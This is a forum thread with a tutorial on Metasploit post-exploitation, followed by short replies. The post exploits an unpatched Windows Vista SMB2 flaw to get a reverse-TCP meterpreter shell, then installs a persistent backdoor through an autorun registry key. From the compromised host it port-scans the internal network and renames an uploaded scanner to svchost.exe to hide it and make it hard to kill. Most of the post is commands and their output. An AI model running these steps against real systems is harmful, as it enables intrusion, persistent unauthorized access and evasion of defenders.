Results 1 to 5 of 5

Thread: Meta "Pivot" Scanning - and other usefull junk

  1. #1
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default Meta "Pivot" Scanning - and other usefull junk

    I apologize if this is written some other place but i found it rather usefull. I took the last few months off to do some really heavy learning and its been a long time since i wrote a guide so honestly im just trying to get my hands dirty before i start writing some more in depth stuff.
    A word to the wise, while there is a way to scan directly through a pivot and it has its advantages, let me tell you something from experience, not only is it slow, but its also highly unreliable. More than a few times it has crashed my session or failed to pick up known open ports.

    All that being said lets get started.

    First you need to go here and download the .zip
    Downloads - pivot-scan - Project Hosting on Google Code

    Now for the install

    unzip pivotscan_rb.zip
    sed -i 's/(Yes)/(,)/' pivot-scan.rb
    sed -i 's/sl -q 1000 -s -c 3/sl -q 1000 -s -c 1000/' pivot-scan.rb
    mv pivot-scan.rb /pentest/exploits/framework3/scripts/meterpreter/
    ### The above sed commands are fairly important otherwise you wont be seeing everything you should.

    Lets loadup msfconsole and find us a vulnerable host

    I managed to find myself a nice and juicy unpatched vista smb2 exploit to use on 192.168.10.104 so ...

    msf > use scanner/smb/smb2

    msf auxiliary(smb2) > set rhosts 192.168.10.104
    rhosts => 192.168.10.104

    msf auxiliary(smb2) > run
    [*] 192.168.10.104 supports SMB 2 [dialect 2.2] and has been online for 87 hours[*] Auxiliary module execution completed
    msf auxiliary(smb2) >
    Now lets cross our fingers

    msf ) > use windows/smb/smb2_negotiate_func_index

    msf > set rhost 192.168.10.104
    rhost => 192.168.10.104

    msf > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

    msf > set lhost 192.168.10.126
    lhost => 192.168.10.126

    msf > set lport 445
    lport => 445

    msf > set ExitOnSession false
    ExitOnSession => false

    msf > exploit -j
    [*] Started reverse handler
    [*] Connecting to the target (192.168.10.104:445)
    [*] Sending the exploit packet (872 bytes)
    [*] Waiting up to 180 seconds for exploit to trigger
    [*] Sending stage (719360 bytes)
    [*] Meterpreter session 1 opened (192.168.10.126:445 -> 192.168.10.104:49208)

    msf > sessions -v
    Active sessions
    ===============
    Id Description Tunnel Via
    -- ----------- ------ ---
    1 Meterpreter 192.168.10.126:445 -> 192.168.10.104:49208 windows/smb/smb2_negotiate_func_index

    msf >
    Sweet!! now we have our nicely exploited pc so lets do a little maintaince then move onto the scanning

    msf > sessions -i 1
    [*] Starting interaction with 1

    meterpreter > sysinfo
    Computer: WIN-BPTA72KBDYU
    OS : Windows Vista (Build 6001, Service Pack 1).
    Arch : x86
    Language: en_US

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

    meterpreter > run persistence -X -i 60 -r 192.168.10.126 -p 8080
    [*] Creating a persistent agent: LHOST=192.168.10.126 LPORT=8080 (interval=60 onboot=true)
    [*] Persistent agent script is 47309 bytes long
    [*] Uploaded the persistent agent to C:\Windows\TEMP\oFVccxSg.vbs
    [*] Agent executed with PID 3904
    [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN
    [*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN

    meterpreter >
    Now that we have a persistent backdoor incase something fails lets start our scanning.


    meterpreter > run pivot-scan.rb -a
    [*] Created by Augusto Pereyra aepereyra at gmail.com
    [*] Uploading Portscanner
    [*] Performing portscanning for IP range 192.168.10.1-192.168.10.254

    -------------------------------------
    192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
    -------------------------------------
    192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
    -------------------------------------
    meterpreter >
    There are a few other ways we can do this also, the first simple way is like so.

    meterpreter > upload /pentest/windows-binaries/scanners/sl.exe c:\\windows\\system32\\
    [*] uploading : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\
    [*] uploaded : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\\sl.exe


    meterpreter > execute -f cmd.exe -c -H -t
    Process 3804 created.
    Channel 3 created.

    meterpreter > interact 3
    Interacting with channel 3...

    Microsoft Windows [Version 6.0.6001]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32> sl -s 192.168.10.1-254
    sl -s 192.168.10.1-254
    Scan of 254 IPs started at Sun Oct 25 22:49:11 2009
    192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
    192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
    -------------------------------------------------------------------------------
    C:\Windows\system32> exit
    meterpreter >
    Ok so on to the last method, first we need to do just a small little change however. It isnt necessary but ill explain.

    cd /pentest/exploits/framework3/scripts/meterpreter/
    sed -i 's/svhost#{rand(100)}/svchost/' uploadexec.rb
    sed -i 's/prin_status/print_status/' uploadexec.rb
    sed -i 's/TEMP/WINDIR/g' uploadexec.rb
    Ok first command changes what you upload from something like svhost11.exe to svchost.exe .. why you ask?? Well 2 reasons one its less obvious, but the more important is because you can not kill anything named svchost.exe .. just try renaming calc.exe and find out. The second is to fix a bug which hopefully within the next day or so will be updated, and the last command just changes our default dir to the default c:windows.

    meterpreter > run uploadexec -e /pentest/windows-binaries/scanners/sl.exe -o "-s 192.168.10.1-254" -v -r
    [*] Running Upload and Execute Meterpreter script....
    [*] Uploading /pentest/windows-binaries/scanners/sl.exe....
    [*] /pentest/windows-binaries/scanners/sl.exe uploaded!
    [*] Uploaded as C:\Windows\svchost.exe
    [*] Running command C:\Windows\svchost.exe

    192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
    192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
    [*] Deleting C:\Windows\svchost.exe
    [*] Finnished!
    meterpreter >
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  2. #2
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009
    Posts
    63

    Default

    Thnx for the info can't wait to try it.. ^_^

  3. #3
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Nicely done
    dd if=/dev/swc666 of=/dev/wyze

  4. #4

    Default

    Great post and thanks for sharing. Looking forward to your next posts.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  5. #5
    Junior Member Miland3r's Avatar
    Join Date
    Jan 2010
    Location
    /dev/random
    Posts
    28

    Default

    Hi vvpalin,
    very neat howto, thanks. Will definitely be looking out for future posts.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •